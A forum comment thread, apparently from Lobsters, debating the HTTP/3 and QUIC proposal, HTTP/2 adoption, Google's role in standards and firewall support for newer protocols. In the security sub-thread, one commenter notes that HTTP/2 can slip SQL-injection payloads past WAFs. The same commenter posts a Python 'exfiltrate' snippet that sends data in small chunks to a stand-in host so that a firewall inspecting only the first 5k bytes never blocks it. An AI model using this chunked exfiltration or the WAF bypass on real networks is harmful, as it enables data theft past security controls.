1. 51
  1.  

  2. 10

    Someone should try to squeeze in support for the use of SRV records for HTTP/3 too.

    1. 3

      Browsers have pretty soundly rejected using SRV records, so that seems DOA.

      1. 4

        Kinda sad because SRV would probably let users host websites at home even if ISPs block port 80.
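
        Purely as a sketch of what that would buy you: with the third-party dnspython package, a client that honored SRV records could discover a non-default port like this (the _http._tcp record name and the domain are illustrative, and no browser actually does this today):

        ```python
        import dns.resolver  # third-party: pip install dnspython

        def lookup_http_endpoint(domain):
            """Return (host, port) from an SRV record, falling back to port 80."""
            try:
                answers = dns.resolver.resolve(f"_http._tcp.{domain}", "SRV")
            except (dns.resolver.NXDOMAIN, dns.resolver.NoAnswer):
                return domain, 80  # no SRV record published
            # Lowest priority value wins; the record carries its own port.
            best = min(answers, key=lambda r: r.priority)
            return str(best.target).rstrip("."), best.port

        # A home user could publish e.g. port 8080 here and dodge a port-80 block.
        print(lookup_http_endpoint("example.com"))
        ```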

        1. 1

          The ISPs specifically want to prevent users from hosting websites. If they can’t do that by blocking port 80, they’ll do it some other way.

      2. 2

        One can use the Alt-Svc header instead.
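
        For illustration, this is roughly what that looks like on the wire (RFC 7838): the origin answers over HTTP/1.1 or HTTP/2 and advertises an HTTP/3 endpoint in a header. A minimal sketch using Python’s standard http.server; the port numbers and max-age are made up:

        ```python
        from http.server import BaseHTTPRequestHandler, HTTPServer

        class AltSvcHandler(BaseHTTPRequestHandler):
            def do_GET(self):
                body = b"hello\n"
                self.send_response(200)
                # Advertise an HTTP/3 endpoint on UDP port 443, cacheable for a day.
                self.send_header("Alt-Svc", 'h3=":443"; ma=86400')
                self.send_header("Content-Length", str(len(body)))
                self.end_headers()
                self.wfile.write(body)

        if __name__ == "__main__":
            HTTPServer(("127.0.0.1", 8080), AltSvcHandler).serve_forever()
        ```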

      3. 15

        I had the urge to check if it’s April Fool’s day yet. Web tech is becoming so overcomplicated so quickly it makes me feel burnt out. Besides, HTTP/2 isn’t even widely supported yet, and they expect us to implement HTTP/3 already? Over UDP, of all things?

        1. 4

          I looked it up and about 90% of browsers support HTTP/2 (IE before Windows 10 was the only one that didn’t), and virtually every web server supports it.

          1. 3

            All three of them? I mean, it’s not like there is a whole lot of diversity in browser engine land.

            As a few random counter-examples, lynx doesn’t seem to support it (note: its underlying libwww library is by the W3C and doesn’t support it!), elinks doesn’t, Dillo doesn’t, Netsurf doesn’t. Even most language HTTP libraries don’t support it (even Python’s Requests library, which is quite active and has lots of contributors, doesn’t).

            Note that curl only supports HTTP/2 via an external library because it is such a complex protocol.
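
            To be fair on the library-support point: Requests has no HTTP/2 support, but the third-party httpx package can negotiate it, and tellingly it also leans on a separate protocol library (h2) rather than implementing the framing itself. A small sketch, assuming it’s installed as `httpx[http2]`:

            ```python
            import httpx  # pip install "httpx[http2]" -- pulls in the h2 protocol library

            with httpx.Client(http2=True) as client:
                resp = client.get("https://www.example.com/")
                # http_version reads "HTTP/2" when the server negotiated it via ALPN,
                # otherwise the client silently falls back to HTTP/1.1.
                print(resp.http_version, resp.status_code)
            ```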

            1. 2

              Fun fact: I just discovered that wget doesn’t even support HTTP/1.1, let alone 2.0 :)
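
              Easy to check for yourself, if you’re curious: listen on a port, point a client at it, and look at the request line it sends (a hypothetical localhost setup; the script never answers, so the client will eventually give up):

              ```python
              import socket

              srv = socket.socket()
              srv.bind(("127.0.0.1", 8080))
              srv.listen(1)
              # Now run e.g. `wget http://127.0.0.1:8080/` in another terminal.
              conn, _ = srv.accept()
              request_line = conn.recv(1024).decode("latin-1").splitlines()[0]
              print(request_line)  # e.g. "GET / HTTP/1.0" vs. "GET / HTTP/1.1"
              conn.close()
              srv.close()
              ```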

          2. 1

            Would the IETF care if this new protocol is not adopted? Or does it consider its position already too strong to treat adoption as a deciding factor?

            1. 2

              I do not think it matters much. As long as the big browsers and major servers implement it, that’s enough.

            2. 1

              That’s because HTTP/2 requires the https:// protocol scheme, so unless you’re willing to partake in the political activities, you’re out!

              It looks like HTTP/3 will have integrated encryption, distinct from TLS, but still based on public certificate support. It’s not clear whether or not it’ll require the https:// address scheme in order to function — hopefully not, and they’ll finally address BCP 188.

            3. 15

              Q: Is the HTTP protocol really the problem that needs fixing?

              I’m under the belief that if HTTP overhead is causing you issues, there are many alternative ways to fix it that don’t require more complexity. A site doesn’t load slowly because of HTTP; it loads slowly because it’s poorly designed in other ways.

              I’m also suspicious of Google’s involvement. HTTP/1.1 over TCP is very simple to debug and do by hand. Google seems to like closing or controlling open things (Google Chat’s support for XMPP, Google AMP, etc.). Extra complexity is something that should be avoided, especially for the open web.
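
              That “debug by hand” property really is the appealing part: the whole exchange fits in a few readable lines, e.g. this rough sketch of a raw HTTP/1.1 request over a plain socket (the host is just an example):

              ```python
              import socket

              with socket.create_connection(("example.com", 80)) as sock:
                  sock.sendall(b"GET / HTTP/1.1\r\nHost: example.com\r\nConnection: close\r\n\r\n")
                  response = b""
                  while True:
                      chunk = sock.recv(4096)
                      if not chunk:
                          break
                      response += chunk

              # The response headers are human-readable text -- no binary framing to decode.
              print(response.decode("latin-1").split("\r\n\r\n", 1)[0])
              ```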

              1. 10

                They have to do the fix on HTTP because massive ecosystems already depend on HTTP and browsers with no intent to switch. There’s billions of dollars riding on staying on that gravy train, too. It’s also worth noting lots of firewalls in big companies let HTTP traffic through but not better-designed protocols. The low-friction improvements get more uptake by IT departments.

                1. 7

                  WAFs and the like barely support HTTP/2, tho; a friend gave a whole talk on bypasses and scanning for it, for example.

                  1. 6

                    Thanks for the feedback. I’m skimming the talk’s slides right now. So far, it looks like HTTP/2 got big adoption but WAFs lagged behind. Probably just riding their cash cows while minimizing further investment. I’m also sensing a business opportunity if anyone wants to build an HTTP/2 and /3 WAF that actually works, with independent testing showing the others don’t. Might help bootstrap the company.

                    1. 3

                      ja, that’s exactly correct: lots of the big-name WAFs/NGFWs/&c. are missing support for HTTP/2 but many of the mainline servers support it, so we’ve definitely seen HTTP/2 as a technique to bypass things like SQLi detection, since they don’t bother parsing the protocol.

                      I’ve also definitely considered doing something like CoreRuleSet atop HTTP/2; could be really interesting to release…
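
                      For anyone curious what the “scanning for it” part looks like in practice, a rough sketch is just an ALPN check during the TLS handshake (the hostname is illustrative); a middlebox that only understands HTTP/1.x has no idea what the resulting h2 frames mean:

                      ```python
                      import socket
                      import ssl

                      def negotiated_protocol(host, port=443):
                          ctx = ssl.create_default_context()
                          ctx.set_alpn_protocols(["h2", "http/1.1"])
                          with socket.create_connection((host, port), timeout=5) as sock:
                              with ctx.wrap_socket(sock, server_hostname=host) as tls:
                                  # Returns "h2" if HTTP/2 was offered and chosen.
                                  return tls.selected_alpn_protocol()

                      print(negotiated_protocol("www.example.com"))
                      ```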

                      1. 4

                        “so we’ve definitely seen HTTP/2 as a technique to bypass things like SQLi detection, since they don’t bother parsing the protocol.”

                        Unbelievable… That shit is why I’m not in the security industry. People mostly building and buying bullshit. There are exceptions, but they’re usually set up to sell out later. Products based on dual-licensed code are about the only thing immune to vendor risk. Seemingly. Still exploring hybrid models to root out this kind of BS or force it to change faster.

                        “I’ve also definitely considered doing something like CoreRuleSet atop HTTP/2; could be really interesting to release…”

                        Experiment however you like. I can’t imagine what you release being less effective than web firewalls that can’t even parse the web protocols. Haha.

                        1. 5

                          “Products based on dual-licensed code”

                          We do this where I work, and it’s pretty nice, tho of course we have certain things that are completely closed source. We have a few competitors that use our products, so it’s been an interesting ecosystem to dive into for me…

                          “Experiment however you like. I can’t imagine what you release being less effective than web firewalls that can’t even parse the web protocols. Haha.”

                          pfff… there’s a “NGFW” vendor I know that…

                          • when it sees a connection it doesn’t know, it analyzes the first 5k bytes
                          • the connection is allowed to continue until the 5k+1th byte arrives
                          • consequently, if your exfiltration process transfers data in chunks of <= 5 kB, you’re OK! (see the sketch below)

                          we found this during an adversary simulation assessment (“red team”), and I think it’s one of the most asinine things I’ve seen in a while. The vendor closed it as “works as expected”.

                          edit: fixed the work link, as that’s a known issue.
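
                          In case the bypass isn’t obvious, here’s one reading of it as a sketch (host, port and chunk size are made up): keep every transfer under the 5k-byte inspection window, e.g. by using a fresh connection per chunk, so the box never gets past its “analyze the first 5k bytes” phase.

                          ```python
                          import socket

                          CHUNK = 4096  # stay under the ~5k-byte inspection window

                          def exfiltrate(data, host, port):
                              # One short-lived connection per chunk; none of them ever reaches
                              # the byte where the appliance would render a verdict.
                              for offset in range(0, len(data), CHUNK):
                                  with socket.create_connection((host, port)) as sock:
                                      sock.sendall(data[offset:offset + CHUNK])

                          exfiltrate(b"A" * 20000, "collector.example.net", 4444)
                          ```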

                          1. 3

                            BTW, Firefox complains when I go to https://trailofbits.com/ that the cert isn’t configured properly…

                            1. 2

                              hahaha Nick and I were just talking about that; it’s been reported before, I’ll kick it up the chain again. Thanks for that! I probably should edit my post for that…

                              1. 2

                                Adding another data point: latest iOS also complains about the cert

                  2. 3

                    “They have to do the fix on HTTP”

                    What ‘fix’? Will this benefit anyone other than Google?

                    I’m concerned that if this standard is not actually a worthwhile improvement for everyone else, then it won’t be adopted and the IETF will lose respect. I’m running on the guess that it’s going to have even less adoption than HTTP/2.

                  3. 13

                    I understand and sympathize with your criticism of Google, but it seems misplaced here. This isn’t happening behind closed doors. The IETF is an open forum.

                    1. 6

                      Just because they do some subset of the decision-making in the open shouldn’t exempt them from blame.

                      1. 3

                        Feels like Google’s turned a lot of public standards bodies into rubber stamps for pointless-at-best, dangerous-at-worst standards like WebUSB.

                        1. 5

                          Any browser vendor can ship what they want if they think it makes them more attractive to users or whatnot. That doesn’t mean it’s a standard. WebUSB shipped in Chrome (and only in Chrome) more than a year ago. The WebUSB spec is still an Editor’s Draft and it seems unlikely to advance significantly along the standards track.

                          The problem is not with the standards bodies, but with user choice, market incentive, blah blah.

                          1. 3

                            “Feels like Google’s turned a lot of public standards bodies into rubber stamps for pointless-at-best, dangerous-at-worst standards like WebUSB.”

                            “WebUSB”? It’s like kuru crossed with ebola. Where do I get off this train.

                          2. 2

                            Google is incapable of doing bad things in an open forum? Open forums cannot be influenced in bad ways?

                            This does not dispel my concerns :/ What do you mean exactly?

                            1. 4

                              If the majority of the IETF HTTP WG agrees, I find it rather unlikely that this is going according to a great plan towards “closed things”.

                              Your “things becoming closed-access” argument doesn’t hold, imho. While I have done lots of plain-text debugging for HTTP, SMTP, POP and IRC, I can’t accept it as a strong argument: whenever debugging gets serious, I go back to writing a script anyway. Also, I really want the web to become encrypted by default (HTTPS). We need “plain text for easy debugging” to go away. The web needs to be great (secure, private, etc.) for users first, engineers second.

                              1. 2

                                That “users first, engineers second” mantra leads to things like Apple and Microsoft clamping down on the general-purpose computer. Think of the children, er, the users! They can’t protect themselves. We’re facing this at work (“the network and computers need to be secure, private, etc.”), and it’s expected we won’t be able to do any development because, of course, upper management doesn’t trust us mere engineers with general-purpose computers. Why can’t it be for everybody, engineers included?

                                1. 1

                                  No, no, you misunderstand.

                                  The “users first / engineers second” principle is not about engineers as end users, as in your desktop-computer example.

                                  What I mean derives from the W3C design principles. That is to say, we shouldn’t avoid significant positive change (e.g., HTTPS over HTTP) just because it’s a bit harder on the engineering end.

                                  1. 6

                                    Define “positive change.” Google shoved HTTP/2 down our throats because it serves their interests, not ours. Google is shoving QUIC down our throats because, again, it serves their interests, not ours. That it coincides with your biases is good for you; others might feel differently. What “positive change” does running TCP over TCP give us (HTTP/2)? What “positive change” does a reimplementation of SCTP give us (QUIC)? I mean, other than NIH syndrome?

                                    1. 3

                                      Are you asking how QUIC and H2 work, or are you saying performance isn’t worth improving? If it’s the latter, I think we’ve figured out why we disagree here. If it’s the former, I kindly ask you to find out yourself before you enter this dispute.

                                      1. 3

                                        I know how they work. I’m asking, why are they reimplementing already implemented concepts? I’m sorry, but TCP over TCP (aka HTTP/2) is plain stupid—one lost packet and every stream on that connection hits a brick wall.
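
                                        To make the “brick wall” concrete, a toy illustration (not real networking, just TCP’s in-order delivery rule): one lost segment creates a gap that stalls frames for every multiplexed stream behind it:

                                        ```python
                                        # Interleaved HTTP/2-style frames for two streams, in TCP arrival order.
                                        frames = [("A", 1), ("B", 1), ("A", 2), ("B", 2)]
                                        lost_index = 1  # pretend the segment carrying frames[1] was dropped

                                        delivered = []
                                        for i, frame in enumerate(frames):
                                            if i == lost_index:
                                                # TCP cannot release anything past the gap until retransmission,
                                                # even though later frames belong to the *other* stream.
                                                break
                                            delivered.append(frame)

                                        print("delivered before the stall:", delivered)  # only ("A", 1); both streams wait
                                        ```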

                                        1. 1

                                          SPDY and its descendants are designed to allow web pages with lots of resources (namely, images, stylesheets, and scripts) to load quickly. A sizable number of people think that web pages should just not have lots of resources.

                          3. 2

                            Hopefully this breaks every “security” middlebox. I wonder what other implications this has; I’ve heard that ISPs do funny stuff with UDP packets because they’re treated as low priority.

                            1. 7

                              It won’t break middleboxes. Middleboxes were one of the driving forces behind building on top of UDP; I don’t know the details, but TCP has some problems that should be fixed and can’t be, because any change to TCP would break middleboxes too badly, so TCP is stuck in the past. Ditto for any (new) protocol directly on top of IP that isn’t TCP or UDP.

                              On the bright side, QUIC fixes these issues. QUIC has had a crypto layer since day 1 with the sole, explicit purpose of preventing middleboxes from working.